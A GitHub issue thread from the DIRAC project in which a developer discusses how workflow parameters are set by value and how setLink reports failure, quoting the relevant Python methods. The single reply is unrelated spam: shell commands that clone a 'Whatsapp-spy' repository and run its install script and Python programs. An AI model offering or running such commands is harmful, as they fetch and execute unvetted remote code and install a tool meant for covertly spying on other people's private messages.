### ISSUE TITLE
Workflow: parameter values, return values

### ISSUE THREAD

**Issue by sposs** [DIRACGrid/DIRAC#176]
Hi,
We are in the process of rewriting the ILCDIRAC interface (API), and I found several things that are subject to discussion:
1) the parameter values are copied by value in the parameter object when set (but only for some types...):
def setValueByType( self, value ):
    type = self.type.lower() # change the register
    if self.isTypeString():
      self.value = str( value )
    elif type == 'float':
      self.value = float( value )
    elif type == 'int':
      self.value = int( value )
    elif type == 'bool':
      self.value = bool( value )
    else:
      #raise TypeError('Can not assing value '+value+' of unknown type '+ self.type + ' to the Parameter '+ str(self.name))
      #print 'WARNING: we do not have established conversion algorithm to assing value ',value,' of unknown type ',self.type, ' to the Parameter ', str(self.name)
      self.value = value

It would be nice to copy by reference, so that one could still change the values later on.

2) the stepInstance.setLink() does not return anything specific (it's in AttributeCollection):

  def setLink( self, name, module_name, parameter_name ):
    if not  self.parameters.setLink( name, module_name, parameter_name ):
      print " in the object=", type( self ), "with name=", self.getName(), "of type=", self.getType()

It would be nice to return S_OK(), S_ERROR() instead of simply a printout. I also think there is something wrong in there as it's possible to link against a parameter that is not defined anywhere...

**Comment by Andrej540** [comment]
apt update
apt upgrade
apt install git
apt install python
git clone https://github.com/STARK-404/Whatsapp-spy/
cd Whatsapp-spy
bash install.sh
python main.py
python index.py
